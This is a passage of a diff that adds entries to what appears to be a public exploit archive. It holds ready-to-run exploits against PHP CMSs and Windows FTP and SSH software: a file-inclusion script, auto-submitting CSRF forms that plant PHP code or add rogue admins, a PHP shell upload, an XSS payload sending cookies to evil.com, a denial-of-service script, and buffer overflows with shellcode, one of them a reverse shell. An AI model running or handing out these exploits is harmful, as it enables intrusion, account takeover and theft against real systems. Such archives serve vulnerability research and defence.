| _________ __ __________.__ |
| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |
| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |
| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ |
|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |
| \/ \/ \/ \/ \/ \/ |
| > SweetRice 1.5.1 Local File Inclusion |
| > Script Cod3r : Ehsan Hosseini |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''
print(banner)
# Get Host & User & Pass & LfiPath
host = input("Enter The Target URL(Example : localhost.com) : ")
username = input("Enter Username : ")
password = input("Enter Password : ")
lfipath = input("Enter File To Download(Example : ../db.php) : ")
xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")
userinfo = {
'user':username,
'passwd':password,
'rememberMe':''
}
with session() as r:
login = r.post('http://' + host + '/as/?type=signin', data=userinfo)
success = 'Login success'
if login.status_code == 200:
print("[+] Sending User&Pass...")
if login.text.find(success) > 1:
print("[+] Login Succssfully...")
else:
print("[-] User or Pass is incorrent...")
print("Good Bye...")
exit()
pass
pass
dlfile = r.get('http://' + host + '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')
if dlfile.status_code == 200:
print('[+] Exploit...')
file = open(xplfile, "w")
file.write(dlfile.text)
file.close()
print('[+] File Saved...')
print('[+] Exploit By Ehsan Hosseini')
else:
print("[-] Error in Exploting...")
pass

39
platforms/php/webapps/40700.html Executable file
View file

@ -0,0 +1,39 @@
<!--
# Exploit Title: SweetRice 1.5.1 Arbitrary Code Execution
# Date: 30-11-2016
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Description :
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server .
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; phpinfo();
Code You Can
Customize Exploit For Your Self .
# Exploit :
-->
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
&lt;/textarea&gt;
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
http://localhost/sweetrice/inc/ads/hacked.php
-->

41
platforms/php/webapps/40701.html Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: ETchat(persian version) CMS Xsrf vulnerability
# Exploit Author: Hesam Bazvand
# Contact: https://www.facebook.com/hesam.king73
# Software Link: http://dl.20script.ir/script/chat/et-chat-3.7-Persian(www.20script.ir).zip
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : User Your Mind ! :D
# Email : Black.king066@gmail.com
#special thanks to my best friend Aryan Bayani Nejad
<html>
<body onload="document.frm1.submit()" >
<script>
var f = document.createElement("form");
f.setAttribute('method',"post");
f.setAttribute('name',"frm1");
f.setAttribute('action',"http://localhost/etchat/?AdminCreateNewRoom");
var i = document.createElement("input"); //input element, text
i.setAttribute('type',"text");
i.setAttribute('name',"room");
i.setAttribute('value',"<ScRiPt \>window.location.replace(\"http://evil.com\" + encodeURIComponent(document.cookie))\</ScRiPt\>");
f.appendChild(i);
//and some more input elements here
//and dont forget to add a submit button
document.getElementsByTagName('body')[0].appendChild(f);
</script>
</body>
</html>

27
platforms/php/webapps/40705.html Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title : Snews CMS Cross Site Request Forgery
# Author : Ashiyane Digital Security Team
# Google Dork : "This site is powered by sNews"
# Date : 1/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://snewscms.com/
# Software link : http://snewscms.com/download/snews1.7.1.zip
# Version : 1.7(latest)
#######################################################3
Change Username and Password of admin
We Dont need old user name and old password
<html>
<!-- CSRF PoC -->
<body>
<form name="form0" action="http://localhost/?action=process&task=changeup" method="POST">
<input type="hidden" name="uname" value="Attacker" /> // new username
<input type="hidden" name="pass1" value="Attacker" /> //new password
<input type="hidden" name="pass2" value="Atacker" />// repeat new password
<input type="hidden" name="task" value="changeup" />
<input type="submit" name="submit_pass" value="Save" />
</form>
</body>
</html>
####################################################
######### exploit by: Amir.ght #####################
####################################################

58
platforms/php/webapps/40706.txt Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title : Snews CMS upload sheller
# Author : Ashiyane Digital Security Team
# Google Dork : "This site is powered by sNews"
# Date : 04/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://snewscms.com/
# Software link : http://snewscms.com/download/snews1.7.1.zip
# Version : 1.7(latest)
#######################################################3
need admin access for upload files but we can upload any file without
bypass(.php,.exe,....)
1-goto http://SiteName/snews_files/
2- click on Browse botton and select you`re file
3- click on upload
sheller path is :
http://SiteName/shell.php
poc url:
http://localhost/snews_files/
Poc header:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/snews_files/
Cookie: PHPSESSID=am9ffv1sg2kjkfnaku69tfgsu5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------92741037415004
Content-Length: 665
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="upload_dir"\r\n
\r\n
.\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n
Content-Type: application/\r\n
\r\n
<?php phpinfo ?><br>\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="ip"\r\n
\r\n
127.0.0.1\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="time"\r\n
\r\n
1478199661\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="upload"\r\n
\r\n
Upload\r\n
-----------------------------92741037415004--\r\n

42
platforms/php/webapps/40707.html Executable file
View file

@ -0,0 +1,42 @@
# Exploit Title : nodcms Cross Site Request Forgery
# Author : Ashiyane Digital Security Team
# Google Dork : -
# Date : 29/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.nodcms.com/en
Software link :
https://github.com/khodakhah/nodcms/archive/master.zip
########################### CSRF PoC ###############################
# create User: username=Attacker & password=123456
<html>
<!-- CSRF PoC -->
<body>
<form name="form0" action="http://SiteName/admin/user_manipulate" method="POST">
<input type="hidden" name="data[username]" value="Attacker" />
<input type="hidden" name="data[email]" value="Attacker@attacker.com" />
<input type="hidden" name="data[fullname]" value="Atacker" />
<input type="hidden" name="data[password]" value="123456" />
<input type="hidden" name="data[status]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
####################################################################
# CSRF/Xss
<html>
<!-- CSRF PoC -->
<body>
<form name="form1" action="http://sitename/admin/settings/generall" method="POST">
<input type="hidden" name="data[language_id]" value="1" />
<input type="hidden" name="data[company]" value="<script>alert(/xss/)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
####################################################################
#-# Discovered by : Amir.ght

36
platforms/php/webapps/40708.html Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title : redaxo CMS CSRF(Add Admin)
# Author : Ashiyane Digital Security Team
# Google Dork : intitle:Login · REDAXO
# Date : 1/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.redaxo.org/
# Software link :http://www.redaxo.org/de/download/file/?f=redaxo_5.2.0.zip
# Version : 5.2(latest)
#######################################################3
admin user : Attacker
admin password : 123456
<html>
<!-- CSRF PoC -->
<body>
<form name="form0" action="http://localhost/redaxo_5.2.0/redaxo/index.php?page=users/users" method="POST">
<input type="hidden" name="userlogin" value="Attacker" /> // username
<input type="hidden" name="username" value="Attacker" />
<input type="hidden" name="userdesc" value="Atacker" />
<input type="hidden" name="useremail" value="hhhhh@hhh.com" />// email
<input type="hidden" name="useradmin" value="1" />
<input type="hidden" name="userstatus" value="1" />
<input type="hidden" name="userperm_be_sprache" value="en_gb" />
<input type="hidden" name="userpsw" value="7c4a8d09ca3762af61e59520943dc26494f8941b" /> //123456
<input type="hidden" name="function" value="1" />
<input type="hidden" name="FUNC_ADD" value="1" />
<input type="hidden" name="save" value="1" />
<input type="hidden" name="javascript" value="1" />
<input type="submit" name="submit_pass" value="Save" />
</form>
</body>
</html>
####################################################
######### exploit by: Amir.ght #####################
####################################################

85
platforms/windows/dos/40699.txt Executable file
View file

@ -0,0 +1,85 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
============
www.labf.com
Product:
=============
Axessh 4.2.2
Axessh is a SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without
sacrificing any of existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own cryptographic software).
2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding
Vulnerability Type:
====================
Denial Of Service
AxeSSH will crash after receiving a overly long payload of junk...
Exploit code(s):
===============
1) Open the settings window for axessh and choose Run then click Run as EXE, this will launch "xwpsshd.exe"
crashes with bad protocol version.
import socket
print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"
ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

112
platforms/windows/remote/40693.py Executable file
View file

@ -0,0 +1,112 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security
Vendor:
============
www.labf.com
Product:
================
WinaXe v7.7 FTP
The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built and provided in the package.
All that you need to run remote UNIX and X Applications is included within WinaXe Plus. You operate simultaneously with
X11, FTP and Telnet sessions and with your familiar MS Windows applications.
Vulnerability Type:
=======================
Remote Buffer Overflow
Vulnerability Details:
======================
WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors when connecting to a malicious FTP Server and
receiving overly long payloads in the command response from the remote server.
220 SERVICE READY
331 USER / PASS
200 TYPE
257 PWD
etc...
below is POC for "server ready" 220 command exploit when first connecting to a FTP server.
Exploit code(s):
===============
import socket,struct
#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
eip=struct.pack('<L',0x68084A6F) #POP ECX RET
jmpesp=struct.pack('<L',0x68017296) #JMP ESP
#We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' Exploit
port = 21
s = socket.socket()
host = '127.0.0.1'
s.bind((host, port))
s.listen(5)
print 'Evil FTPServer listening...'
while True:
conn, addr = s.accept()
conn.send('220'+payload+'\r\n')
conn.close()
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

89
platforms/windows/remote/40694.txt Executable file
View file

@ -0,0 +1,89 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt
[+] ISR: Apparition Security
Vendor:
======================
www.rapidphpeditor.com
Product:
===============================
Rapid PHP Editor IDE
rapidphp2016.exe v14.1
Rapid PHP editor is a faster and more powerful PHP editor for Windows combining features of a fully-packed PHP IDE with
the speed of the Notepad. Rapid PHP is the most complete all-in-one software for coding PHP, HTML, CSS, JavaScript and
other web development languages with tools for debugging, validating, reusing, navigating and formatting your code.
Vulnerability Type:
=============================
CSRF Remote Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
There is a Remote Command Execution ailment in this IDE, if a user of this IDE is running the internal debug server
listening on localhost port 89 and they open a link or visit a malicious webpage then remote attackers can execute arbitrary
commands on the victims system.
Reference:
http://forums.blumentals.net/viewtopic.php?f=15&t=7062
Exploit code(s):
================
Call Windows "calc.exe" as POC
<a href="http://127.0.0.1:89/~C/Windows/system32/calc.exe">Click it!</a>
OR
<form action="http://127.0.0.1:89/~C/Windows/system32/calc.exe" method="post">
<script>document.forms[0].submit()</script>
</form>
Disclosure Timeline:
=============================================
Vendor notification: October 5, 2016
Vendor confirms vulnerability: October 7, 2016
Vendor releases fixed version: November 1, 2016
November 2, 2016 : Public Disclosure
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

61
platforms/windows/remote/40704.py Executable file
View file

@ -0,0 +1,61 @@
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0 ACCT Command Buffer Overflow Exploit
# Date: 3/11/2016
# Exploit Author: Cybernetic
# Version: 2.0
# Tested on: Windows XP Profesional SP3 ESP x86
# CVE : N/A
import socket, os, sys
ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7
#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
#nc -lvp 443
#Send exploit
shellcode=("\xba\xac\x84\x20\xa3\xda\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x52\x31\x57\x12\x83\xc7\x04\x03\xfb\x8a\xc2\x56\xff\x7b\x80"
"\x99\xff\x7b\xe5\x10\x1a\x4a\x25\x46\x6f\xfd\x95\x0c\x3d\xf2"
"\x5e\x40\xd5\x81\x13\x4d\xda\x22\x99\xab\xd5\xb3\xb2\x88\x74"
"\x30\xc9\xdc\x56\x09\x02\x11\x97\x4e\x7f\xd8\xc5\x07\x0b\x4f"
"\xf9\x2c\x41\x4c\x72\x7e\x47\xd4\x67\x37\x66\xf5\x36\x43\x31"
"\xd5\xb9\x80\x49\x5c\xa1\xc5\x74\x16\x5a\x3d\x02\xa9\x8a\x0f"
"\xeb\x06\xf3\xbf\x1e\x56\x34\x07\xc1\x2d\x4c\x7b\x7c\x36\x8b"
"\x01\x5a\xb3\x0f\xa1\x29\x63\xeb\x53\xfd\xf2\x78\x5f\x4a\x70"
"\x26\x7c\x4d\x55\x5d\x78\xc6\x58\xb1\x08\x9c\x7e\x15\x50\x46"
"\x1e\x0c\x3c\x29\x1f\x4e\x9f\x96\x85\x05\x32\xc2\xb7\x44\x5b"
"\x27\xfa\x76\x9b\x2f\x8d\x05\xa9\xf0\x25\x81\x81\x79\xe0\x56"
"\xe5\x53\x54\xc8\x18\x5c\xa5\xc1\xde\x08\xf5\x79\xf6\x30\x9e"
"\x79\xf7\xe4\x31\x29\x57\x57\xf2\x99\x17\x07\x9a\xf3\x97\x78"
"\xba\xfc\x7d\x11\x51\x07\x16\xde\x0e\x06\xa1\xb6\x4c\x08\x2c"
"\xfc\xd8\xee\x44\x12\x8d\xb9\xf0\x8b\x94\x31\x60\x53\x03\x3c"
"\xa2\xdf\xa0\xc1\x6d\x28\xcc\xd1\x1a\xd8\x9b\x8b\x8d\xe7\x31"
"\xa3\x52\x75\xde\x33\x1c\x66\x49\x64\x49\x58\x80\xe0\x67\xc3"
"\x3a\x16\x7a\x95\x05\x92\xa1\x66\x8b\x1b\x27\xd2\xaf\x0b\xf1"
"\xdb\xeb\x7f\xad\x8d\xa5\x29\x0b\x64\x04\x83\xc5\xdb\xce\x43"
"\x93\x17\xd1\x15\x9c\x7d\xa7\xf9\x2d\x28\xfe\x06\x81\xbc\xf6"
"\x7f\xff\x5c\xf8\xaa\xbb\x6d\xb3\xf6\xea\xe5\x1a\x63\xaf\x6b"
"\x9d\x5e\xec\x95\x1e\x6a\x8d\x61\x3e\x1f\x88\x2e\xf8\xcc\xe0"
"\x3f\x6d\xf2\x57\x3f\xa4")
shell= '\x90'*30 + shellcode
buffer='\x41'*2007+ ret + shell + '\x43'*(696-len(shell))
print "Sending Buffer"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.1.10',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('ACCT' +buffer+ '\r\n')
s.close()
print "Attack Buffer Overflow Successfully Executed"